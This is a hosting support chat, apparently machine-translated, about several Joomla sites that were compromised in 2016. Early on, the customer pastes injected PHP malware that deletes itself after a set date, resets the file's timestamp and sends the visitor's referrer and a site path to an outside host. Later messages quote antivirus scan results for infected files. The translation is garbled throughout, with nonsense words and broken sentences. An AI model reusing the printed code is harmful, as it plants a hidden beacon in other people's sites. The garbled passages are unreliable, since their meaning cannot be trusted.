| Question: |
Good afternoon. When you open the website at the top of page writes check_meta(); check_meta function(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456734627){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,\"check_meta();\")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime);}}} @file_get_contents(\"http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=\".$_SERVER[`HTTP_REFERER`].\"&vpage=http://\".$_SERVER[`SERVER_NAME`].\"/components/com_newsfeeds/models/models.php\"); } This is a problem with the server? If Yes, when will be fixed? |
| Answer: |
Hello. on what engine your website? this is similar to hacking and inserting malicious code on the website |
| Question: |
This website on Joomla 1.5. What you need to do to fix the problem? |
| Answer: |
then you have a serious problem with the site`s security. this website critically vulnerable Read https://revisium.com/ru/blog/joomla_rce_all_versions_affected.html this is a description of the problem and recommendations for action |
| Question: |
On Your server we have 4 website. On one site writes this error and others open very late. It`s not a problem with the server? |
| Answer: |
you have website hacked, this is the main problem, you need to reset as faster. issues with the server not. the rest of your sites if they are on the old joomla as it is likely infected |
| Question: |
They Jumla 3.6 and no problems with them definitely not |
| Question: |
I understand the problem can be solved replacing the file session.php ? |
| Answer: |
you need to perform updates and prophetical vulnerable file |
| Question: |
One website the problems of hacking, and the other 3 sites? what about them? on Your server on a different hosting open 1.5 minutes |
| Answer: |
what kind of sites are we talking? if the sites are not on this account - create a support ticket from the account on which the site is located |
| Question: |
Here is the website on this account that long http://servicecenter056.in.ua/ |
| Question: |
I did everything as written on the link, propeccia, the problem is not solved, what else can you do? |
| Answer: |
How long ago there was a similar problem and have You installed any additional komponenty, scripts, counters, etc.? |
| Question: |
no, the problem appeared about an hour ago, nothing was set and not changed. the problem is the same with two sites on the other hosting on Your server. can go to another account. There is also a very long time did nothing |
| Answer: |
list the amps. the sites to which You have a similar problem, but in 99% of cases this occurs at the Vinet third-party services, i.e. for example You have a counter, and the service with which he works and is loaded is not available, so the page is not otobrazhatsya until I get a response from server or not take place response time. |
| Question: |
On drugom account http://esma-service.com.ua, http://www.servicecenter044.in.ua/ On this account http://www.servicecenter056.in.ua/, http://remonttechniki.com.ua/ |
| Question: |
You forgot about me? |
| Answer: |
Let`s first check Your site for viruses since this may be the reason for such work. In Your cnom office create application for scan All sites, which found similar problems. |
| Question: |
Sent a request to scan 2 sites with that account and 2 from another (esma), what`s next? |
| Answer: |
Ogilvie, BB for 30-40 min sites will proskenion, report sent to Your Inbox. |
| Question: |
I`ll be waiting. And in the case of the detection of the virus will help You cure or will need to seek a specialist? |
| Answer: |
depends what it is, if something is standard, it is clean we can, but the problem is that if the virus get there oidn of times, he can get there one more time. so is vulnerability, and you better be sure to contact the experts that give guarantee. we Have a partner in this area, if needed. we Awake to hope that not required :) |
| Question: |
I would hope ,and somehow very suspiciously similar problem appeared simultaneously on 4 sites. Forward) |
| Answer: |
what engine work sites? |
| Question: |
remonttechniki.com.ua - joomla 1.5 and three jomla 3.4.8 |
| Question: |
The one in the 1.5 opens quickly, but with error, and those in 3.4.8 - open correctly, but 1.5-2 minutes |
| Answer: |
the autopsy will show, but in Joomal and WP is now a global vulnerability, and shityy now broken on the right and left :( |
| Question: |
I still have 2 that are similar to those of the site with the same theme, Joomla 3.4.8 from another hosting provider, there are no problems found, why I figured a problem with the server |
| Answer: |
we`ll check your site for viruses. the problem is not depends on the host only. |
| Question: |
Came results check website servicecenter056.in.ua tell me what to do next? |
| Answer: |
open the result , it shows the files that are infected , viruses and suspicious. you may submit the report in revisium , the report itself should be a link https://revisium.com/ru/order/#fform free analysis |
| Question: |
And treatment sites? Guys, this is neserzno, at one point I stopped working 4 different sites, on different engines on your server, not one , not two, but 4 !!! at the same time!!! despite the fact that I have nothing changed! now I need to treat them for money somewhere?! but what is your protection against break-ins, for which I zaplatila far ahead?! |
| Answer: |
what kind of paid protection from break-ins is it? website hacked due to vulnerability. This protection principle can not be distributed. You as a website administrator must monitor the site regularly to carry out its Obnovlenie. we don`t have a treatment but we can help You love the help in this question. |
| Question: |
As 4 have been compromised because of a vulnerability? maybe the hack was from your server? |
| Question: |
now, to send me to treat the site for the money?! |
| Answer: |
what does the server if you site is vulnerable. you otkryli the link we gave You? Read https://revisium.com/ru/blog/joomla_rce_all_versions_affected.html http://esma-service.com.ua/AI-BOLIT-REPORT-__-655984-22-02-2016_16-56.html here is your vulnerability /home/esma/public_html/tmp/install_54f43bd4046a1/libraries/joomla/session/session.php this file you need to patch. what sites have You do not on joomla? you have all the joomla sites http://servicecenter044.in.ua/AI-BOLIT-REPORT-__-601127-22-02-2016_17-02.html |
| Answer: |
http://servicecenter056.in.ua/AI-BOLIT-REPORT-__-470469-22-02-2016_17-04.html |
| Answer: |
and here`s yours too /home/april82/public_html/tmp/install_5436c26282128/fv_newsportal.zip: {HEX}base64.inject.unclassed.7.UNOFFICIAL FOUND
/home/april82/public_html/tmp/958.zip: {HEX}base64.inject.unclassed.7.UNOFFICIAL FOUND
/home/april82/public_html/modules/mod_gk_weather/tmpl/default.php: {HEX}base64.inject.unclassed.6.UNOFFICIAL FOUND
/home/april82/public_html/components/com_smfaq/views/category/tmpl/default.php: {HEX}base64.inject.unclassed.6.UNOFFICIAL FOUND
/home/april82/public_html/tmp/install_54c63abfb71ff/jv_inci_j15/JV Inci Quickstart package.zip: Zip.Suspect.MacroDoubleExtension-zippwd FOUND
/home/april82/public_html/tmp/install_54c63abfb71ff/jv_inci_j15/JV Inci template installation.zip: Zip.Suspect.MacroDoubleExtension-zippwd FOUND
/home/april82/public_html/tmp/install_54c6321a81a3e/zt_zana15_installpackage.zip: Zip.Suspect.MacroDoubleExtension-zippwd FOUND
/home/april82/public_html/tmp/install_54c6321a81a3e/zt_zana15_quickstart.zip: Zip.Suspect.MacroDoubleExtension-zippwd FOUND
/home/april82/public_html/tmp/ZT_Zana_J15.zip: Zip.Suspect.MacroDoubleExtension-zippwd FOUND |
| Answer: |
here`s a site restored from backup servicecenter056.in.ua it works, works fast. but it also needs to patch. now we perform a scan. |
| Question: |
These are files which have no one-month and they have exactly nothing to http://servicecenter044.in.ua and http://esma-service.com.ua. A patch file (which I did even in the morning) , does not solve the problem! |
| Answer: |
http://servicecenter056.in.ua/AI-BOLIT-REPORT-__-378635-22-02-2016_17-16.html the infected website. |
| Question: |
thank you, and so all sites can be done? to restore from backup? |
| Answer: |
inform what sites you have now is not working. |
| Question: |
http://remonttechniki.com.ua on this account,http://esma-service.com.ua/ ,http://servicecenter044.in.ua/ on the other |
| Answer: |
please create a ticket from the account that is experiencing the same problem and now we are going to do http://remonttechniki.com.ua |
| Question: |
Well, sites this account has already earned, now I will create a ticket in another account |
| Question: |
Thank you |
| Answer: |
thank you for contacting the technical support |
